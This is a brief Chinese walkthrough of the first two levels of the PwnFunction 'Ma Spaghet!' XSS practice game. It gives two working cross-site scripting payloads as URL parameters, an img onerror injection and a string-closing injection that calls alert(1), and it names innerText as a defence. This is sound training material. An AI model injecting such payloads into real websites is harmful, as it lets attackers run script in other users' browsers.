一、环境
XSS Game - Ma Spaghet! | PwnFunction
二、开始闯关
第一关
看看代码
试一下直接写
明显进来了为什么不执行看看官方文档吧
你不执行那我就更改单标签去使用呗
?somebody=<img%20src=1%20onerror="alert(1)">
防御:
innerText
第二关
看看源码:
考察一个基础的闭合
?jeff=1";alert(1)//
后续待更新
xss高级靶场
凌晨五点的星2024-03-02 9:13
相关推荐
前端加油站5 分钟前
一种新HTML 页面转换成 PDF 技术方案w***Q35012 分钟前
Vue打包有事没事实验室17 分钟前
router-link的custom模式常乐我净61625 分钟前
十、路由和导航Tonychen25 分钟前
TypeScript 里 infer 常见用法米诺zuo26 分钟前
MUI sx prop 中的响应式适配周尛先森27 分钟前
都React 19了,他到底带来了什么?洞窝技术32 分钟前
一键屏蔽某国IP访问实战fruge44 分钟前
前端自动化脚本:用 Node.js 写批量处理工具(图片压缩、文件重命名)Jolyne_1 小时前
antd Image base64缓存 + loading 态优化方案